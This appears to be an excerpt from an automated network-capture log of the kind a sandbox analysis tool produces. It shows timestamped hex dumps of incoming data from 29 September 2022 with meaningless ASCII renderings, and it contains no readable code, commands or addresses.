                                                                                                                                                    2022-09-29 12:59:02 UTC6055INData Raw: 48 02 29 f4 6d ff b7 6a 03 5a ba da 23 6c 5f aa 5f 38 ae ae 7a e4 bc c8 bd 38 f3 11 d7 5b 4a bc 87 23 74 ed 9d 9a 66 15 03 45 46 68 cd 40 43 6b d4 82 ac 5b 85 44 87 92 69 81 24 4c 8e 99 59 70 89 be 8f dd ff 70 18 e6 b9 92 8c 32 8d ef 9a 70 d8 04 01 4b fb 80 9e 32 cb 7c 77 10 5c cb ae 6c a6 9f 7e b2 62 11 7b b8 b1 7f 58 ce f0 d7 6c 27 db 8b 7a 54 11 d1 e0 5d af 59 7e 81 eb b3 21 25 c6 40 4d 0c 56 ca 6b b5 03 43 f9 af 9e b9 5e b4 57 9d 46 44 c6 81 1b ce 87 96 de 2e 7d 04 fe 16 c1 19 18 40 ce 17 82 32 e4 a3 26 e5 3c f5 bf b6 07 8b be c3 41 4a 64 f8 07 57 1b 20 3d 46 4f d1 77 3d 06 29 d2 7c b4 2c 14 8e c8 c8 d4 1d 4b fa 3e 34 95 92 08 fe 3c 74 e4 c9 e0 c2 58 bb ed 79 3f 11 29 96 3e 47 ce a3 27 fa 68 9b 3b cc 85 92 e3 6f 85 2c af 6a 9e c2 9d be 0e ab 1c a3 67
                                                                                                                                                    Data Ascii: H)mjZ#l__8z8[J#tfEFh@Ck[Di$LYpp2pK2|w\l~b{Xl'zT]Y~!%@MVkC^WFD.}@2&<AJdW =FOw=)|,K>4<tXy?)>G'h;o,jg
                                                                                                                                                    2022-09-29 12:59:02 UTC6071INData Raw: a3 c3 76 78 a1 64 2d 22 f4 11 29 6d db 77 78 19 1f 52 7d e2 39 63 f2 d0 7c c3 d4 c0 c4 ab 9d 5e c7 7f 21 d5 39 60 89 cf e6 43 ac c0 d6 e2 5b ae 35 51 cc 61 01 8f 53 b8 fa 40 fe c9 32 87 0a 56 09 64 f4 05 4d 1e b7 94 96 67 e2 84 6d 8d 0d 6e d4 5a d4 8e 14 97 0b 25 1a c4 0f 84 13 70 28 cd e1 e6 65 dc 85 8d 98 3b 3a 7d 47 0f 33 a3 a3 f8 5f 4b 44 6e 71 1a e7 09 23 77 1b e9 7c 55 c7 8c 10 3f 13 27 95 a8 7f 1a 92 e0 f8 f0 05 c9 99 9b ae 2a 49 f9 df c6 d3 88 c3 07 c6 e8 b1 02 be 71 89 1e 3b 10 6e a9 42 a4 00 ca 31 a4 40 76 8d 55 7a 48 8b 8c 2f ed 0c 86 a3 b4 6b b3 5d 0f 0f 56 02 f8 b6 4e 25 c8 ee a3 42 de f7 44 ec 68 03 9d bb 65 a9 7c 69 f6 53 86 91 6c b2 06 0e 8d de 23 3c 21 a7 dd b7 7d 14 ae 8b 0e 1f 2b 05 3e f1 97 d4 64 66 06 1f c4 49 b8 ee 68 bf 06 07 af 73
                                                                                                                                                    Data Ascii: vxd-")mwxR}9c|^!9`C[5QaS@2VdMgmnZ%p(e;:}G3_KDnq#w|U?'*Iq;nB1@vUzH/k]VN%BDhe|iSl#<!}+>dfIhs
                                                                                                                                                    2022-09-29 12:59:02 UTC6087INData Raw: 19 80 a1 ab 04 2e 42 9a b8 c9 f4 5a 2f 37 de 7b 52 79 6e f9 71 ee 4f 26 cb 56 e5 00 32 6e 6c 78 9d 1b df 2b d6 1c 3a 83 b7 31 a6 8d 57 29 bf 0e f0 ff ea d3 92 3f 8f c3 e8 99 7e a2 44 fb e6 df 8b 2c 8d be c4 da bb 54 65 4a c8 3f 72 95 65 51 df 1c 8f 4e 6d 7a 99 3f 36 7d 5c 65 7e e8 78 62 9c 48 7b c0 6d 69 f4 2a e3 d5 0d d2 9d fc 23 6c bc c3 94 8f a2 9a 05 eb a9 e5 da 21 36 6e 43 4e 9d 51 e0 9b f8 44 4f e5 18 72 d4 58 90 c1 20 db 00 f5 a4 e2 2b 90 5c c1 64 1a 1c c9 bb 9f cb 5e aa f1 6a 68 3c 02 4d 63 93 7d c7 25 a7 87 6d 1d ed b0 02 50 e0 d7 0d b9 8c c2 0a 05 de 58 01 17 6d 98 de 3c 04 5a 02 ce d8 61 e5 7c e5 2d a2 5b f6 6c 08 c0 7e 99 36 05 db 2e fb 30 69 6c 48 ee 4a 94 d0 0b a1 24 ab 7e 07 e4 cc 93 43 02 76 75 7c 62 e6 d8 16 7a 5f 8a 8f 06 8f 34 9a 36 8f
                                                                                                                                                    Data Ascii: .BZ/7{RynqO&V2nlx+:1W)?~D,TeJ?reQNmz?6}\e~xbH{mi*#l!6nCNQDOrX +\d^jh<Mc}%mPXm<Za|-[l~6.0ilHJ$~Cvu|bz_46
                                                                                                                                                    2022-09-29 12:59:02 UTC6097INData Raw: 15 13 43 7e 92 46 a0 18 72 fc 89 5c 41 f0 54 8d 9d 29 de 4c 25 ec 3c 5c d7 23 96 60 01 7a 5b 6f 6d d5 6d 14 85 91 55 38 23 1c 38 c0 a8 d4 b5 a0 0c 74 da 7d 86 fe 91 a2 52 e2 c4 18 48 fc b7 62 46 c4 c7 66 eb dd 47 a8 ab 83 63 bd f5 f0 61 a3 96 c2 bf 35 3b 45 8d b7 09 de e5 ea 2a 00 5c 64 0d ca 4f db 14 f1 c2 93 9f 1c 2c fc 08 7c d1 8a 04 25 02 63 ff d3 21 34 5b 6e d7 06 c5 1f 6e 3d 92 5b 8e 84 3d 79 5f 3f 39 f3 60 ac e9 b8 52 66 7e 1f b2 bd 2c 96 2e 9b 23 1f 3a 2d 59 2f 1f d0 72 ad d0 02 7c fe 44 3d bb e0 86 22 ca d6 62 5c 9a f3 f6 1d 35 1f d1 48 c9 0c cd 77 0f e6 7a 60 c1 f3 50 e1 6a 60 41 55 5d b4 16 8f 48 c5 f5 d5 6e 80 c0 07 56 78 88 fd 15 0a 41 aa 5a b0 fe 27 8e 26 e6 ba 6c cc 88 ab f5 f4 a5 33 41 7e 7a 9f 81 8c 93 d0 7c ca 1e 6c a8 9c 1f f9 d9 de 4b
                                                                                                                                                    Data Ascii: C~Fr\AT)L%<\#`z[ommU8#8t}RHbFfGca5;E*\dO,|%c!4[nn=[=y_?9`Rf~,.#:-Y/r|D="b\5Hwz`Pj`AU]HnVxAZ'&l3A~z|lK
                                                                                                                                                    2022-09-29 12:59:02 UTC6113INData Raw: a4 5f a5 8a f7 89 9b c4 9e a4 68 45 2d d1 41 dd 85 09 8c f1 8e 8a a8 81 95 41 ae e9 ba ef d8 aa c1 cb b6 59 5d 56 06 00 20 64 e1 db d3 f9 d4 db 1b 96 c7 f1 d8 54 65 93 f9 66 f3 f4 7c e1 ae 26 93 12 b5 f6 68 dd fa 6b b5 7e 51 91 86 24 0e d9 89 a4 87 5a 5e fe 22 52 e2 94 f6 2e d1 5c df 98 2d 5c 08 c4 be b9 00 05 ff 49 6c 83 b9 76 15 7a eb 14 04 7b cb 84 3d ec f5 92 b6 65 dc 96 58 f7 11 20 0e 5a f3 aa 0f 9e 86 55 f4 bd b3 e4 c5 d0 85 55 5f e8 44 b7 b4 2b 2e fd 46 be 9b 0e 34 34 46 15 3a 8a a0 a9 ce 25 3f 33 aa 82 99 8d 0f 42 a3 77 8e d8 2e 32 22 41 1b c7 07 33 ff aa 6f 58 87 2b 5f f9 fd e6 5b 7f 8c bc 42 b7 04 ce 77 86 15 ff ec 88 ac df 8f a6 96 9b 9f 6a 8e 6d 40 cf e0 39 36 99 ff cc ed 16 a6 dd b7 f4 30 b7 c9 ed cc de 39 73 16 a6 db 88 4c 2f eb 58 4e ab d8
                                                                                                                                                    Data Ascii: _hE-AAY]V dTef|&hk~Q$Z^"R.\-\Ilvz{=eX ZUU_D+.F44F:%?3Bw.2"A3oX+_[Bwjm@9609sL/XN
                                                                                                                                                    2022-09-29 12:59:02 UTC6129INData Raw: ff cb 3c 7c 47 4f 89 1c d1 73 49 53 e2 ec bc a3 f3 69 bb d9 e9 20 d1 05 44 3a a4 aa 33 69 72 d3 e1 ac d9 52 fa fb 3e 2c 3b d8 a0 5b 42 f8 fd 1c 77 7e d0 3c 52 c5 97 9b 87 db 2d c8 3f 07 07 0a 5a 87 5c ee 03 48 3e f0 b3 3e fc cd 68 f8 18 b8 0b e0 fc 3b 86 3b 45 b8 fe 8e 13 92 a6 1a 48 91 3d 62 75 25 d1 78 cc f3 66 07 1e 2f 50 52 00 c3 e8 c4 5c 9d 31 35 de e9 a9 76 6f 15 b0 39 e3 f6 09 c7 db c8 9e 21 b7 fa d1 9c 0e a6 3d 06 14 f2 84 03 55 40 bc 2f 99 8a f3 77 7d e0 5a b2 98 1f c3 87 a6 87 c6 46 e2 bc 70 06 cf 12 45 31 ae 6f 5e 63 a6 e3 ae 68 c0 22 00 2a b1 3a 7a d7 b4 13 84 e2 2c 28 c9 fd e1 bf ad 17 e5 e2 35 33 0b dd 66 28 6d d9 36 c6 f0 1a 37 3f 14 e1 03 7d 12 88 b4 05 6d 96 71 3e 99 b1 e5 c5 34 b3 b7 0a 60 b7 f3 e3 e4 f6 35 d4 82 df a7 8e 3d a5 0b 7e 2e
                                                                                                                                                    Data Ascii: <|GOsISi D:3irR>,;[Bw~<R-?Z\H>>h;;EH=bu%xf/PR\15vo9!=U@/w}ZFpE1o^ch"*:z,(53f(m67?}mq>4`5=~.
                                                                                                                                                    2022-09-29 12:59:02 UTC6145INData Raw: 44 4d 0d 5e 1a 89 8b d7 1a d0 ce 1e 43 5e 8b fc 44 80 cb 71 36 43 21 b0 a2 86 3d d6 8c 29 bd 98 a2 87 5e 45 be 27 80 25 b7 e8 b1 e6 7e ff 26 0c 74 ab 09 cc 86 91 2b 60 2d 6f 48 55 d4 da f4 f3 1b 2e c3 de a0 fb fa 12 f5 03 2d 40 8c ad 9e a8 5b 07 e4 ed e3 4c 49 ad 4e 12 f5 4b f3 61 a7 55 c6 85 3a 68 7a c5 e6 6f d9 e7 77 ab 54 a2 c3 26 ff 84 10 24 a6 a1 42 42 4c 3e 6d ac e7 a7 d5 3b a7 76 cd 35 da 7c b9 d7 76 c9 5c b8 b2 58 8e b4 95 7d 4d 04 46 ed f4 64 b2 d2 27 d4 f1 dd 2d 0f 79 cf 58 29 6f 25 ad d7 47 25 00 3b 86 f6 ed 0f b0 2f b9 10 36 15 82 37 f3 a0 d6 8f 50 fa 2d f8 83 7c 5b c0 e9 55 46 5b c6 f6 c6 8d f2 4a 6a 6b 43 c1 5a 3b 4b 8f eb 14 91 1d c5 f8 90 00 d9 51 53 f7 e7 7a ba 8d 83 99 8b e9 ff 76 ce be c0 3e 95 0b d8 c9 03 cf 3d bd 96 e2 42 e1 a8 c6 46
                                                                                                                                                    Data Ascii: DM^C^Dq6C!=)^E'%~&t+`-oHU.-@[LINKaU:hzowT&$BBL>m;v5|v\X}MFd'-yX)o%G%;/67P-|[UF[JjkCZ;KQSzv>=BF
                                                                                                                                                    2022-09-29 12:59:02 UTC6161INData Raw: f6 e6 15 39 68 03 bd 8a 9d 04 2c a2 b7 17 6c 29 99 55 3d 68 4a d0 ab 47 4d 2f d7 1c ea e7 db c1 2e 8a 80 d6 f4 f4 4a 19 90 6a 88 db a9 39 6a dd 7b ad 87 19 c2 9a bf 59 5b ba 71 32 ae 5d a3 a3 16 d6 c8 1e 9e 78 46 36 6d dd 2f 97 3f b3 e0 64 08 f7 a5 ba 73 b0 3f 9a 20 73 99 67 4f 3d fc 9b 6f dc fe 14 32 2f ea cf 3c 11 a2 11 2d 4e 49 5e f8 1c 62 71 85 74 35 2e f8 5d aa 4e 0e d8 80 0a 6b a9 75 7a 22 3f b5 a2 7c 48 ca ab 1f e5 20 76 c8 6f 05 ba ae 5b f4 46 d5 d0 60 c0 ad 22 e6 a5 74 cd ef 7d 9d 4f 60 09 6c e9 cc 44 23 cd 65 5e bd 30 22 a3 a1 a1 55 da 55 76 95 95 92 2e 08 1a bf e5 1b a2 eb 10 4b a1 88 8b 48 d9 cd 49 2e 48 df f3 a0 38 db 1d 67 f4 4b 13 ae a0 03 af 99 ca 21 73 52 4f 2c 4a bf 78 30 4b c2 f9 f2 46 b5 25 54 5e 16 1d 9a 4f 76 4b 13 35 76 a4 58 64 7a
                                                                                                                                                    Data Ascii: 9h,l)U=hJGM/.Jj9j{Y[q2]xF6m/?ds? sgO=o2/<-NI^bqt5.]Nkuz"?|H vo[F`"t}O`lD#e^0"UUv.KHI.H8gK!sRO,Jx0KF%T^OvK5vXdz
                                                                                                                                                    2022-09-29 12:59:02 UTC6177INData Raw: e2 46 08 bb fd bb 19 d8 0d 36 f0 99 08 1d 0e f6 61 51 e4 6e 59 fe e1 f6 47 e2 13 d8 fc f1 7d fb 45 24 a8 7e 44 74 75 de 8f 68 cb 0b cc 53 2e dc 93 19 af 07 56 c4 06 77 a0 b4 01 60 7a da ab bc eb f9 38 01 44 5c 8d 39 29 65 32 1b d0 da dc f0 33 1d 3d 9e 8d 13 1e d2 a5 d2 5d 09 08 92 3f 06 a5 fc d4 df 65 e9 19 ed 05 62 c5 65 c0 9a 80 80 1e 2c c9 64 76 7e 63 51 1d e4 61 a9 3a 1c fe 38 b7 40 ca 32 41 0f d2 c4 43 ac ff c8 51 3a 45 54 a6 8c ee c4 5f 47 33 c6 58 6c 44 67 b6 cf 51 ed 83 84 10 b8 2a 7f b8 bb 95 c9 56 59 4d 1d b2 ae 1c af 9f 8d c6 2a 24 de fb a2 0d 88 60 24 e0 8a 5f 51 2c df af 8a e2 2a 2f 80 97 e2 bc 1d 29 3a 0b 1d 0d 37 f0 b9 f1 31 8e 72 2f 10 c5 eb 31 5f b3 3a 92 b5 33 d0 ea 1d 48 91 5d ed 56 e8 16 44 56 52 60 23 21 a1 97 e6 2e dc 76 ad 18 09 e2
                                                                                                                                                    Data Ascii: F6aQnYG}E$~DtuhS.Vw`z8D\9)e23=]?ebe,dv~cQa:8@2ACQ:ET_G3XlDgQ*VYM*$`$_Q,*/):71r/1_:3H]VDVR`#!.v
                                                                                                                                                    2022-09-29 12:59:02 UTC6193INData Raw: 63 3e ea 7c 92 3c c3 d7 b4 0e a2 ac e5 b2 27 1b c1 c1 dd 18 f0 f8 07 e0 e3 36 7c 9e 03 d7 18 5e 97 df 41 ff 43 bc d0 5d ce 80 62 59 20 61 8b 83 74 59 b4 90 e3 88 25 2d 58 a1 0d d5 60 12 14 b1 75 79 85 7d 36 78 cc ef c9 29 16 ff ae 20 c5 a9 10 ed 7c e8 1e ef f9 10 a4 1d 9b 18 3a 42 91 a0 82 e4 d6 a2 c7 de c7 42 a0 7f 86 40 b4 80 37 2d 34 63 11 44 22 c5 5c 24 63 25 da 18 80 90 f8 6d 94 2f a5 d8 71 47 7a 58 a0 5e e1 a5 29 55 51 1f 29 58 93 85 e4 ee 4c f8 a0 3a 6d b9 83 7b ea 5c 3d c0 73 60 2a 36 c4 fd 93 7f 4c 6b 8e fd 79 96 c7 03 b9 14 3a 56 30 85 26 2a 56 e6 00 44 34 91 c9 14 64 2d a3 d7 70 2f 27 f8 17 fc 03 06 d5 ba d5 36 d7 ea 79 40 9c bd c3 15 cb 10 aa 2e fe 12 9d a4 eb cd e4 9c 56 1d 3b e1 aa 88 9e 29 08 74 e8 a4 dd e7 a6 d9 32 bc 90 16 1e 05 3b b9 8e
                                                                                                                                                    Data Ascii: c>|<'6|^AC]bY atY%-X`uy}6x) |:BB@7-4cD"\$c%m/qGzX^)UQ)XL:m{\=s`*6Lky:V0&*VD4d-p/'6y@.V;)t2;
                                                                                                                                                    2022-09-29 12:59:02 UTC6209INData Raw: c7 e1 1d ef d6 d2 3d 5c 74 77 2f 58 25 67 4c 77 fe cc 05 27 83 6a 5e 27 d5 c3 30 f8 62 8a 79 69 58 de dd 8c f8 39 c2 40 7c 0b 81 1c c2 d8 8b 05 92 91 7d 30 b3 20 6f 1b b7 b5 61 ce c7 9a 6e 3c 14 aa a0 cb 68 64 14 b1 19 bc cf eb 3b 00 1f 31 df 98 df be 6c c9 4e bc e1 81 05 60 f8 17 43 21 a7 3c 15 f8 9a 08 f3 df 79 8c 29 d9 19 a0 a7 73 e4 61 07 ca 77 17 6c 10 47 e7 fb 45 7a 07 8c cc 18 ca 31 12 bb fd 62 c6 7d 4f 20 1f 7c 4a f9 18 a7 88 ca d6 e9 8f 32 40 9b c5 95 cd 64 c0 43 a2 4a 9c 66 1e 30 1a 61 e0 55 2f c2 8b 91 68 fc 15 fb ea 34 f0 0b 33 ae 82 4d 79 28 e6 58 9e 2c 34 17 97 49 63 6e 31 4c 10 be ed 8f d2 c4 c8 06 3e 0d 59 0a e2 fb b2 35 7b d3 2e e2 cf 10 b1 a4 c7 46 bd a7 4e 6c e3 a5 b6 5d 78 95 a7 37 01 50 3c f7 0a ab d3 31 5c 16 fc 2b a6 33 0e 1c d6 3f
                                                                                                                                                    Data Ascii: =\tw/X%gLw'j^'0byiX9@|}0 oan<hd;1lN`C!<y)sawlGEz1b}O |J2@dCJf0aU/h43My(X,4Icn1L>Y5{.FNl]x7P<1\+3?
                                                                                                                                                    2022-09-29 12:59:02 UTC6225INData Raw: df 0a d0 09 26 49 4a 28 3c 1f 26 82 63 79 b0 ca 63 bc 58 0b 03 b3 ee 87 26 97 e7 60 ff 6d 5a 46 e5 c5 f2 07 22 e5 25 15 68 6d 08 61 68 97 9d 83 4b d0 2e b5 92 1c 38 d1 53 5f a8 05 45 7e 61 73 fd b1 ae fd 31 6f 0f 96 4a 07 df f2 a4 58 91 85 4a 6a 20 ca 50 04 ff d1 47 13 02 0f 94 7b 5d a6 df 21 2f 2c a9 0b 82 5e 61 fe f0 fe dc 1a c8 3f c7 cf 62 b1 6d e3 79 de 5a 79 bb 7e b9 03 0b 72 5a a0 ad 78 47 39 97 bc 59 4c fb d2 68 b6 16 ed b1 4e 60 e8 df 98 31 c1 91 69 ba 9d ee b5 77 51 06 e4 f6 bf 11 8e 49 7a 67 ea 1c 41 12 fb dd 8a b3 d5 66 b2 76 5c af 73 72 2a 0c b7 3c cd b9 44 6a 4f 8e 64 7e 2f 55 05 45 78 d7 32 13 4c c7 50 05 90 f7 89 03 c9 5e 20 06 50 3e 63 78 78 81 ab 19 6a f0 2e 3c 10 ac 5d af 4c e3 ef 2f cd 20 4b 9a c8 42 51 ce 31 77 e5 96 34 85 e4 93 4e 8b
                                                                                                                                                    Data Ascii: &IJ(<&cycX&`mZF"%hmahK.8S_E~as1oJXJj PG{]!/,^a?bmyZy~rZxG9YLhN`1iwQIzgAfv\sr*<DjOd~/UEx2LP^ P>cxxj.<]L/ KBQ1w4N
                                                                                                                                                    2022-09-29 12:59:02 UTC6241INData Raw: e0 64 dd 38 40 23 3f d6 20 a7 46 9a 99 ae 2c cc 45 cb 50 c7 5b 16 2e 5c 51 ce 71 32 c4 c5 b1 f4 0f 90 67 a6 91 10 30 8a 9f 10 ef fc 99 17 2e 86 c2 40 f3 47 f5 9c fd 79 32 47 48 91 09 e2 f4 1b 2c 5a 83 bb ab 6b b7 9d 07 23 b1 47 90 93 b5 09 89 fe 85 e0 fd 62 6d c5 7a 44 49 2b 49 b0 5a ff 46 67 9b d4 6a 52 37 9d 9e 94 d6 e0 83 d6 58 c4 e8 ca 31 35 2f 46 c4 e8 c5 70 17 45 ae 5e 18 f4 22 87 16 88 02 f5 51 07 e2 e3 5e c9 3a 52 5e 09 ab ab 30 26 a5 ff 6e db c8 4a 59 70 c9 4c 03 3c a5 14 4c d7 c7 19 9a de 33 4c c6 e6 42 71 db 52 a1 86 d5 b7 41 e4 86 f5 88 2c 47 dc 2c 9b 2f ef 00 3b 97 ca 2c 64 43 91 82 3e 99 3e 66 a9 c7 04 99 47 07 10 71 85 6e 09 52 e0 1f fb df 47 a8 98 70 02 0b 8f 5c 57 cc d1 10 f5 f8 c4 5c 70 be 14 37 58 8f 75 95 e9 40 70 ec 1a 84 ee c6 48 be
                                                                                                                                                    Data Ascii: d8@#? F,EP[.\Qq2g0.@Gy2GH,Zk#GbmzDI+IZFgjR7X15/FpE^"Q^:R^0&nJYpL<L3LBqRA,G,/;,dC>>fGqnRGp\W\p7Xu@pH
                                                                                                                                                    2022-09-29 12:59:02 UTC6257INData Raw: c8 f8 d6 85 1a 49 27 56 6f cb 5f 81 78 23 ab 6e a3 7e b1 5f 15 2e 84 28 5c 03 dc 13 60 40 0c 19 84 06 3a 9b d4 82 26 58 48 25 4f 74 e1 01 4b 4f 3d a5 57 b2 91 26 42 53 37 c1 5e c8 79 01 ad 01 a4 ef 70 cc 9f 50 9c a1 a2 2e a5 e8 57 0a 9e 56 b0 84 ba 80 52 f1 5f ce 51 d2 12 aa 96 b8 fc 2f 6d 23 11 e0 f3 3b 27 09 47 0a 0c ee aa cf 51 3a 24 f3 a5 08 03 b7 37 20 58 00 b7 24 df 44 73 33 ec f9 34 81 08 d7 66 24 f4 46 41 55 8a 77 d1 af 7b 8d 82 33 1b 63 76 97 24 9f 30 49 5c eb 4d 15 01 a2 8b 9f cb 99 08 7c 39 d8 29 0b 77 82 66 e9 6d 7c 6f cb 4d 4c 43 31 57 3d a1 18 67 73 b2 d1 0e 1a 2f cd 66 c7 1e 19 b4 a2 7c 42 21 3d 18 52 b6 0d f2 47 c6 66 34 57 cc 3e a5 cc 63 d3 de 03 1e f8 bc a7 78 6d 89 a8 0f a4 68 14 bf e4 19 51 f3 dd b3 22 77 f7 5b 54 0a 79 8f db 16 34 dd
                                                                                                                                                    Data Ascii: I'Vo_x#n~_.(\`@:&XH%OtKO=W&BS7^ypP.WVR_Q/m#;'GQ:$7 X$Ds34f$FAUw{3cv$0I\M|9)wfm|oMLC1W=gs/f|B!=RGf4W>cxmhQ"w[Ty4
                                                                                                                                                    2022-09-29 12:59:02 UTC6273INData Raw: 77 c2 44 f6 4a f7 98 2e 9d 0d f6 4c 2c 18 fd 7d 09 3d ec 65 ee b5 44 d6 f3 6b 89 b0 fb 58 4e ec ca 2c 42 e9 40 e9 61 cd ca d5 5c b2 6e 4c 79 c2 19 d5 d9 aa c4 70 74 e2 c7 84 bc 34 f7 ca 7e d9 bb c4 82 3c fd ff a7 bc 7a 7c b0 84 ba 9f be 60 9e 37 10 79 87 ee 68 b7 91 8b 2a 39 d8 fa b9 a2 9e bb 96 b4 80 7f 8a 2c e2 aa 7f 14 89 f6 7d 43 d2 51 89 c5 b5 d1 91 c0 49 56 bd fe 0f d3 53 bb 5c e2 7a 17 86 1e 97 f7 e6 7d 22 68 32 34 5d e4 fa 9f ce 90 13 15 2a ef c0 e8 c9 09 3f 78 68 3e ad b0 6d 53 f1 ad 15 65 d4 60 49 c3 77 8f fb 52 76 c3 57 d6 27 90 c3 68 78 6f 50 fd be 7b 07 43 24 94 a7 a6 49 7f 93 89 80 5a 4d 9e 8d 38 ac f9 29 26 47 15 cc dd 1f d7 0a 45 9a 29 05 cd 1a 5f a6 d4 09 31 48 ca d0 e4 c8 ab 28 b3 62 f1 78 60 9c 36 4d fe c4 64 d2 8a db 9f 91 1e 06 da ec
                                                                                                                                                    Data Ascii: wDJ.L,}=eDkXN,B@a\nLypt4~<z|`7yh*9,}CQIVS\z}"h24]*?xh>mSe`IwRvW'hxoP{C$IZM8)&GE)_1H(bx`6Md
                                                                                                                                                    2022-09-29 12:59:02 UTC6289INData Raw: 12 21 08 63 ea 6a 0a 49 f2 42 35 3b 90 95 e9 3f aa 4e 21 cb 08 a3 10 cb b3 86 c0 0d 4a 2f f9 50 9e 2b cd 11 62 7d 67 89 37 a8 76 cd 01 5d ab 09 17 6e cf 75 a3 81 6f 7c cc 7d 6d d9 8a 26 b9 3a 8c 74 5e 83 70 b7 79 b2 18 2b ef 98 ce 23 f0 ea 82 c8 9f 59 f3 9a 6a 3f fd 08 11 f4 db 17 99 f8 22 14 a2 f5 f0 99 56 49 3b 8d f5 7a f3 4e b5 83 12 09 d4 a8 9a 28 9e a9 ad a5 35 0d 5a 2f dc ad 88 22 8a 7f 6a 57 c1 c3 9c 0c 25 dd b5 48 8e f4 ad 62 23 73 71 2f db 0e 2d 9a fc 2d 0c 21 b6 2b f8 e2 97 c5 6b 10 90 db 0f 06 39 0a 6b b4 bb c4 50 fe 6e 49 5c 13 e4 dc c6 a3 70 55 cc 23 08 1e 22 b4 d8 9d 6e 70 c5 7f 40 29 52 cb b6 5b 12 0f 9d e3 4d 4a 72 36 60 0d 20 e4 a2 73 3e b2 1d 70 69 7f 59 47 9f b6 1a 2b a4 a0 54 b0 b1 39 93 8b a2 0a c8 0a 36 84 71 d3 c8 34 8b 0e 23 59 3e
                                                                                                                                                    Data Ascii: !cjIB5;?N!J/P+b}g7v]nuo|}m&:t^py+#Yj?"VI;zN(5Z/"jW%Hb#sq/--!+k9kPnI\pU#"np@)R[MJr6` s>piYG+T96q4#Y>
                                                                                                                                                    2022-09-29 12:59:02 UTC6305INData Raw: 18 d1 27 b6 6d 75 16 7d bc 2f ca 7c f0 36 c9 df 8e fe b5 6e 14 4d ba 48 5b be 54 30 91 c7 34 24 7e 5d e8 42 e9 fd 51 c1 b9 b8 74 f3 26 f8 e0 7f d5 75 cd 00 4c 38 c7 fb 20 18 a9 36 50 d1 bb 59 19 af c9 0a f4 29 a4 90 4f c0 33 01 e7 d9 cf 08 a4 d1 3e 74 33 ef a7 28 bd 3b e7 a4 dc eb 84 eb c5 56 17 9e c6 78 0b ae 02 32 c0 be 4a 51 00 59 72 d5 88 b8 fb f5 2f b8 87 36 a6 58 e3 c2 a7 1f 9a 15 63 3c 0d 38 53 84 11 46 10 b8 fc 47 f8 8e b4 be 71 24 bb ec 6e 65 d8 e6 62 a3 3e 5c 59 83 9f a3 4a 71 0a 61 04 e0 21 a6 26 e2 7f 56 28 ab 5b d8 b8 fb 0b 84 2c 65 1d a5 fd 1c 8b 60 50 63 6f 47 b2 ea d4 e3 75 54 fc df 34 09 ba 4d 2a e8 70 e1 83 41 41 94 0c 8f b7 b7 64 3c 3d a2 c0 b5 91 4d 20 a3 98 39 81 bb bb 25 ed e0 52 da a4 2b 55 a5 84 49 72 f9 1b 6a 32 93 4c 75 43 d7 50
                                                                                                                                                    Data Ascii: 'mu}/|6nMH[T04$~]BQt&uL8 6PY)O3>t3(;Vx2JQYr/6Xc<8SFGq$neb>\YJqa!&V([,e`PcoGuT4M*pAAd<=M 9%R+UIrj2LuCP
                                                                                                                                                    2022-09-29 12:59:02 UTC6321INData Raw: 57 e1 4d 30 28 8b 31 76 d8 b9 ac 43 00 bf e4 1d ac 28 55 9a 21 29 fe 98 5f ed 82 b8 c7 75 1c 4a dc d7 f9 5f 7b b8 7a be 26 bf c6 17 ec bf 5e 32 93 81 12 ec 18 65 d4 c0 a8 c4 f5 26 fe 2f a8 60 37 2e d3 0b 66 9a 83 ec bb fb a6 4e be b2 39 fd 6d 4d fb 5a eb 05 f6 4c 94 18 54 e5 96 97 1d 9b fd 13 41 13 e7 1a b8 08 8b 08 56 0f 78 64 19 d4 c3 17 d6 15 0e 5d 05 a0 06 83 6d f8 8b ff 95 14 b4 a1 30 12 b1 4b b2 2d 7e 9e 8c d5 4a d5 95 37 22 c8 29 58 9c 81 d4 69 57 44 5c a1 f6 f4 0c 9b b6 41 57 18 0b d1 4b ba 41 38 c9 30 b7 f2 b2 2f 55 19 d1 91 ad 6b ab b0 e1 f2 11 00 fd b3 61 d1 b0 4b 5c 6b 30 7f 48 e3 20 32 70 7e 4f 93 8c f1 21 e1 fd 41 03 23 30 62 62 ff 61 69 a3 73 55 58 62 46 4a 60 40 9a da b7 7f be 06 ef 4e 28 1b 5a 21 aa 99 64 a9 c2 ba bd 0e 1e a2 25 1a b7 21
                                                                                                                                                    Data Ascii: WM0(1vC(U!)_uJ_{z&^2e&/`7.fN9mMZLTAVxd]m0K-~J7")XiWD\AWKA80/UkaK\k0H 2p~O!A#0bbaisUXbFJ`@N(Z!d%!
                                                                                                                                                    2022-09-29 12:59:02 UTC6337INData Raw: 70 18 fc 34 eb ac 24 41 6a 96 15 a4 1e 3f fb a3 e5 77 c9 65 18 b6 08 ad 6b a6 96 fc d3 20 02 fc 5f d7 cf 99 f9 90 ca c6 5c 01 93 c9 48 e6 8c 07 e4 d0 49 e2 79 51 0d 16 d7 42 41 e5 13 99 8f f9 b2 b2 a0 40 ea f5 15 f8 c4 ca 22 03 3a a2 7a a0 aa 26 30 55 cc 7d 65 6e 3e cd 99 83 fa 90 6f 36 8e ba f2 de f1 ca 00 f1 66 7e 2b 44 37 f6 48 e5 87 4a bc 08 a0 c2 18 40 af 35 3f 02 fd eb fe 87 c3 bf 6c 54 0a af 0e 1e d3 2c 53 03 58 19 90 b6 bb f4 d9 57 ba 52 6d 65 e6 90 5a 2b 0e 1d 9e 4d 21 d1 8d 91 5d 91 43 5f e1 2a 1f 9c 37 96 e5 6a 45 ed 74 5b 78 b3 eb 43 2d b9 39 24 f8 82 5f af 4c c2 67 f3 c8 a0 6d c2 07 da 95 75 b9 46 d5 47 f3 08 e7 49 d5 89 81 67 af 20 a1 d3 89 6a 19 15 50 d1 ac 67 b2 c9 b6 8e dc 11 53 74 6a fd 5c e2 ae a4 46 a8 9b 7e 61 b5 24 ae 63 ec ba 69 05
                                                                                                                                                    Data Ascii: p4$Aj?wek _\HIyQBA@":z&0U}en>o6f~+D7HJ@5?lT,SXWRmeZ+M!]C_*7jEt[xC-9$_LgmuFGIg jPgStj\F~a$ci
